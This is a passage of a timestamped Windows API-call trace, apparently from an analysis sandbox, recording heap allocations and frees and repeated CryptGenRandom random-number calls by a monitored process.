dwFlags=0x0, lpMem=0x2eae28 | out: hHeap=0x2b0000) returned 1 [0032.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf30 | out: hHeap=0x2b0000) returned 1 [0032.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae28 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0032.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e95b0 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8310 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8200 | out: hHeap=0x2b0000) returned 1 [0032.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae28 | out: hHeap=0x2b0000) returned 1 [0032.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e80f0 | out: hHeap=0x2b0000) returned 1 [0032.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8310 | out: hHeap=0x2b0000) returned 1 [0032.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0032.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0032.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6c80 | out: hHeap=0x2b0000) returned 1 [0032.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0032.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0032.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead18 | out: hHeap=0x2b0000) returned 1 [0032.886] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.886] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.887] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.887] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.887] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.887] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.888] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.888] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.888] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.888] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.889] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.889] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.889] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.890] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.890] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.890] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.891] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.891] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.891] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.891] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.891] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.891] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.892] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.892] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.892] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.893] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.893] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.893] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.894] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.894] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.894] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.895] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.895] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.895] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.896] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.896] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.896] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.896] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.896] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.897] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.897] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.897] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.897] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.898] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.898] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.898] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.899] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.899] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.959] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.959] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.959] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.960] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.960] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.960] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.960] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.961] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.961] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.961] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.962] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.962] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.962] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.963] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.963] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.963] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.963] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.963] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.964] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.964] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.964] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.964] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.965] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.965] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.965] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.966] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.966] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.966] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.967] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.967] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.967] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.967] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.967] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.967] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.968] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.968] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.968] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.969] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.969] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.969] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.970] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.970] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.970] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.970] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.971] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.971] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.971] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.971] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0033.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6c80 [0033.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0033.017] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2eac90) returned 1 [0033.017] CryptGenRandom (in: hProv=0x2eac90, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.018] CryptReleaseContext (hProv=0x2eac90, dwFlags=0x0) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0033.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eac08 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d08 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2ead30 [0033.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae48 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2ecd18 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x10c) returned 0x2ecda0 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0033.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecd18 | out: hHeap=0x2b0000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0033.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0033.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9520 [0033.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb078 [0033.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] 